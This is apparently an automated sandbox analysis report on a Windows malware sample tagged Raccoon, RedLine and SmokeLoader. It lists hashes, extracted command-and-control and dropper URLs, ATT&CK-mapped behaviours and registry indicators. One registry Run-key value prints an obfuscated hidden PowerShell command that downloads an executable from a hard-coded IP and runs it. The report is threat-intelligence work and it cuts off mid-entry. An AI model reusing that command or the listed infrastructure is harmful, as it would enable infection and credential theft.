raccoon | 5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129

Analysis

max time kernel
150s
max time network
154s
platform
windows10_x64
resource
win10v20210408
submitted
11-08-2021 19:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d4537efd24d9b886648bd32b6ce4da99.exe
Size

207KB
MD5

d4537efd24d9b886648bd32b6ce4da99
SHA1

1a014d098b8ef7ecef5ec124ddef0030c42da509
SHA256

5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129
SHA512

e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4

Score

10^/10

raccoon redline smokeloader 2ca2376c561d1af7f8b9e6f3256b06220a3db187 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes

url4cnc
https://telete.in/johnyes13

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 5 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	2752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4976	2752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	2752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5028	2752	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	716	2752	schtasks.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1344-196-0x00000000048F0000-0x0000000004983000-memory.dmp	family_raccoon
behavioral2/memory/1344-197-0x0000000000400000-0x0000000002CB1000-memory.dmp	family_raccoon
behavioral2/memory/2728-201-0x0000000004900000-0x0000000004991000-memory.dmp	family_raccoon
behavioral2/memory/2728-203-0x0000000000400000-0x0000000002CB0000-memory.dmp	family_raccoon
behavioral2/memory/4184-261-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4184-268-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\28A9.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\28A9.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\4675.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\4675.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 2732 created 1344 2732 WerFault.exe 4ADB.exe
PID 3836 created 2728 3836 WerFault.exe 4FCE.exe
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

33 4124 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 2732 created 1344	2732	WerFault.exe	4ADB.exe
PID 3836 created 2728	3836	WerFault.exe	4FCE.exe

flow	pid	process
33	4124	powershell.exe

Executes dropped EXE 53 IoCs

Processes:

1974.exe1EE4.exe1EE4.tmp1EE4.exe1EE4.tmp28A9.exe2CF0.exe2FFE.exefsucenter.exe4675.exeRuntimebroker.exe4ADB.exe4FCE.exe2FFE.execheat.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exeDatabase.exeDatabase.exefsucenter.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
188	1974.exe
1976	1EE4.exe
2300	1EE4.tmp
1164	1EE4.exe
2064	1EE4.tmp
2248	28A9.exe
4036	2CF0.exe
4040	2FFE.exe
2836	fsucenter.exe
2224	4675.exe
2888	Runtimebroker.exe
1344	4ADB.exe
2728	4FCE.exe
4184	2FFE.exe
4636	cheat.exe
4820	Database.exe
4832	Database.exe
4872	install.exe
4924	HostData.exe
4744	Database.exe
2520	Database.exe
5064	Database.exe
2100	Database.exe
4144	Database.exe
4064	Database.exe
4324	Database.exe
2988	Database.exe
4480	Database.exe
4572	Database.exe
4644	Database.exe
4700	Database.exe
2252	Database.exe
4072	Database.exe
4456	Database.exe
4540	Database.exe
4428	Database.exe
2364	Database.exe
4736	install.exe
4868	Database.exe
4964	Database.exe
5072	Database.exe
3884	fsucenter.exe
1704	Database.exe
4268	Database.exe
4620	Database.exe
4228	Database.exe
4064	Database.exe
4344	Database.exe
4416	Database.exe
4252	Database.exe
4376	Database.exe
4200	Database.exe
4124	Database.exe

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe28A9.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4675.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	28A9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	28A9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4675.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe

Deletes itself 1 IoCs

Processes:

pid process

2996
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Loads dropped DLL 1 IoCs

Processes:

fsucenter.exe

pid process

2836 fsucenter.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2996

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

pid	process
2836	fsucenter.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\28A9.exe	themida
C:\Users\Admin\AppData\Local\Temp\28A9.exe	themida
behavioral2/memory/2248-153-0x0000000000EC0000-0x0000000000EC1000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\4675.exe	themida
C:\Users\Admin\AppData\Local\Temp\4675.exe	themida
behavioral2/memory/2224-183-0x0000000000EB0000-0x0000000000EB1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exeinstall.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\catsrvps\\lsass.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fsucenter = "\"C:\\Users\\Admin\\AppData\\Roaming\\BI Video Controller for x86 systems\\log20210811_215406\\fsucenter.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ShellExperienceHost = "\"C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\resources\\ShellExperienceHost.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\regedit\\explorer.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WerFault = "\"C:\\Windows\\SysWOW64\\wcnwiz\\WerFault.exe\""	install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 36 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe28A9.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	28A9.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4675.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 5 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Windows\SysWOW64\wcnwiz\WerFault.exe	install.exe
File created	C:\Windows\SysWOW64\wcnwiz\ee201eac4591f0b16735de891f3d31be299085b8	install.exe
File created	C:\Windows\SysWOW64\catsrvps\lsass.exe	install.exe
File opened for modification	C:\Windows\SysWOW64\catsrvps\lsass.exe	install.exe
File created	C:\Windows\SysWOW64\catsrvps\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9	install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

28A9.exe4675.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
2248	28A9.exe
2224	4675.exe
4820	Database.exe
4820	Database.exe
4820	Database.exe
4832	Database.exe
4832	Database.exe
4832	Database.exe
4744	Database.exe
4744	Database.exe
4744	Database.exe
2520	Database.exe
2520	Database.exe
2520	Database.exe
5064	Database.exe
5064	Database.exe
5064	Database.exe
2100	Database.exe
2100	Database.exe
2100	Database.exe
4144	Database.exe
4144	Database.exe
4144	Database.exe
4064	Database.exe
4064	Database.exe
4064	Database.exe
4324	Database.exe
4324	Database.exe
4324	Database.exe
2988	Database.exe
2988	Database.exe
2988	Database.exe
4480	Database.exe
4480	Database.exe
4480	Database.exe
4572	Database.exe
4572	Database.exe
4572	Database.exe
4644	Database.exe
4644	Database.exe
4644	Database.exe
4700	Database.exe
4700	Database.exe
4700	Database.exe
2252	Database.exe
2252	Database.exe
2252	Database.exe
4072	Database.exe
4072	Database.exe
4072	Database.exe
4456	Database.exe
4456	Database.exe
4456	Database.exe
4540	Database.exe
4540	Database.exe
4540	Database.exe
4428	Database.exe
4428	Database.exe
4428	Database.exe
2364	Database.exe
2364	Database.exe
2364	Database.exe
4868	Database.exe
4868	Database.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

d4537efd24d9b886648bd32b6ce4da99.exe2FFE.exeinstall.exe

description	pid	process	target process
PID 628 set thread context of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 4040 set thread context of 4184	4040	2FFE.exe	2FFE.exe
PID 4872 set thread context of 4736	4872	install.exe	install.exe

Drops file in Windows directory 4 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\f8c8f1285d826bc63910aaf97db97186ba642b4f	install.exe
File created	C:\Windows\regedit\explorer.exe	install.exe
File created	C:\Windows\regedit\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	install.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources\ShellExperienceHost.exe	install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 23 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3916	4036	WerFault.exe	2CF0.exe
720	4036	WerFault.exe	2CF0.exe
3836	4036	WerFault.exe	2CF0.exe
2736	4036	WerFault.exe	2CF0.exe
1232	4036	WerFault.exe	2CF0.exe
1176	4036	WerFault.exe	2CF0.exe
2744	2888	WerFault.exe	Runtimebroker.exe
3008	1344	WerFault.exe	4ADB.exe
1336	2888	WerFault.exe	Runtimebroker.exe
1144	2888	WerFault.exe	Runtimebroker.exe
980	1344	WerFault.exe	4ADB.exe
3960	2888	WerFault.exe	Runtimebroker.exe
1532	1344	WerFault.exe	4ADB.exe
876	2728	WerFault.exe	4FCE.exe
784	1344	WerFault.exe	4ADB.exe
2980	2888	WerFault.exe	Runtimebroker.exe
3920	2728	WerFault.exe	4FCE.exe
2732	1344	WerFault.exe	4ADB.exe
2860	2888	WerFault.exe	Runtimebroker.exe
2064	2728	WerFault.exe	4FCE.exe
744	2888	WerFault.exe	Runtimebroker.exe
3916	2728	WerFault.exe	4FCE.exe
3836	2728	WerFault.exe	4FCE.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

d4537efd24d9b886648bd32b6ce4da99.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4537efd24d9b886648bd32b6ce4da99.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4537efd24d9b886648bd32b6ce4da99.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d4537efd24d9b886648bd32b6ce4da99.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5028 schtasks.exe
716 schtasks.exe
4952 schtasks.exe
4976 schtasks.exe
2688 schtasks.exe

pid	process
5028	schtasks.exe
716	schtasks.exe
4952	schtasks.exe
4976	schtasks.exe
2688	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

fsucenter.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	fsucenter.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 